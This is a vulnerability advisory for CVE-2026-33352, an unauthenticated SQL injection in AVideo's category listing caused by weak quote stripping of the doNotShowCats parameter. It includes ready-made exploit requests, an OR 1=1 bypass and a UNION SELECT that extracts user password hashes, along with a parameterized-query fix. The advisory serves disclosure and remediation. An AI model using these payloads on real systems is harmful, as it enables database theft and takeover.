CVE-2026-33352
Summary
An unauthenticated SQL injection vulnerability exists in objects/category.php in the getAllCategories() method. The doNotShowCats request parameter is sanitized only by stripping single-quote characters (str_replace("'", '', ...)), but this is trivially bypassed using a backslash escape technique to shift SQL string boundaries. The parameter is not covered by any of the application's global input filters in objects/security.php.
Affected Component
File: objects/category.php, lines 386-394, inside method getAllCategories()
if (!empty($_REQUEST['doNotShowCats'])) {
$doNotShowCats = $_REQUEST['doNotShowCats'];
if (!is_array($_REQUEST['doNotShowCats'])) {
$doNotShowCats = array($_REQUEST['doNotShowCats']);
}
foreach ($doNotShowCats as $key => $value) {
$doNotShowCats[$key] = str_replace("'", '', $value); // INSUFFICIENT
}
$sql .= " AND (c.clean_name NOT IN ('" . implode("', '", $doNotShowCats) . "') )";
}Root Cause
- Incomplete sanitization: The only defense is
str_replace("'", '', $value), which strips single-quote characters. It does not strip backslashes (``). - No global filter coverage: The
doNotShowCatsparameter is absent from every filter list inobjects/security.php($securityFilter,$securityFilterInt,$securityRemoveSingleQuotes,$securityRemoveNonChars,$securityRemoveNonCharsStrict,$filterURL, and the_idsuffix pattern). - Direct string concatenation into SQL: The filtered values are concatenated into the SQL query via
implode()instead of using parameterized queries.
Exploitation
MySQL, by default, treats the backslash (`) as an escape character inside string literals (unless NOBACKSLASHESCAPES SQL mode is enabled, which is uncommon). This allows a backslash in one array element to escape the closing single-quote that implode()` adds, shifting the string boundary and turning the next array element into executable SQL.
Step-by-step:
- The attacker sends:
```
GET /categories.json.php?doNotShowCats[0]=&doNotShowCats[1]=)%20OR%201=1)--%20-
```
- After
str_replace("'", '', ...), values are unchanged (no single quotes to strip):
- Element 0: ``
- Element 1:
) OR 1=1)-- -
- After
implode("', '", ...), the concatenated string is:
```
', ') OR 1=1)-- -
```
- The full SQL becomes:
```sql
AND (c.clean_name NOT IN ('', ') OR 1=1)-- -') )
```
- MySQL parses this as:
'\'— the` escapes the next'`, making it a literal quote character inside the string. The string continues., '— the comma and space are part of the string. The next'(which was the opening quote of element 1) closes the string.- String value =
',(three characters: quote, comma, space) ) OR 1=1)— executable SQL. The first)closesNOT IN (, the second)closes the outerAND (.-- -— SQL comment, discards the remainder') )
Effective SQL:
```sql
AND (c.clean_name NOT IN (', ') OR 1=1)
```
This always evaluates to TRUE.
For data extraction (UNION-based):
GET /categories.json.php?doNotShowCats[0]=\&doNotShowCats[1]=))%20UNION%20SELECT%201,user,password,4,5,6,7,8,9,10,11,12,13,14%20FROM%20users--%20-Produces:
AND (c.clean_name NOT IN ('\', ')) UNION SELECT 1,user,password,4,5,6,7,8,9,10,11,12,13,14 FROM users-- -') )This appends a UNION query that extracts usernames and password hashes from the users table. The attacker must match the column count of the original SELECT (determinable through iterative probing).
Impact
- Confidentiality: Full read access to the entire database, including user credentials, emails, private video metadata, API secrets, and plugin configuration.
- Integrity: Ability to modify or delete any data in the database via stacked queries or subqueries (e.g.,
UPDATE users SET isAdmin=1). - Availability: Ability to drop tables or corrupt data.
- Potential RCE: On MySQL configurations that allow
SELECT ... INTO OUTFILE, the attacker could write a PHP web shell to the server's document root.
Suggested Fix
Replace the string concatenation with parameterized queries:
if (!empty($_REQUEST['doNotShowCats'])) {
$doNotShowCats = $_REQUEST['doNotShowCats'];
if (!is_array($doNotShowCats)) {
$doNotShowCats = array($doNotShowCats);
}
$placeholders = array_fill(0, count($doNotShowCats), '?');
$formats = str_repeat('s', count($doNotShowCats));
$sql .= " AND (c.clean_name NOT IN (" . implode(',', $placeholders) . ") )";
// Pass $formats and $doNotShowCats to sqlDAL::readSql() as bind parameters
}Alternatively, use $global['mysqli']->realescapestring() on each value as a minimum fix, though parameterized queries are strongly preferred.
Package Versions Affected
Automatically patch vulnerabilities without upgrading
CVSS Version



Related Resources
References
https://github.com/WWBN/AVideo/security/advisories/GHSA-mcj5-6qr4-95fj, https://github.com/WWBN/AVideo
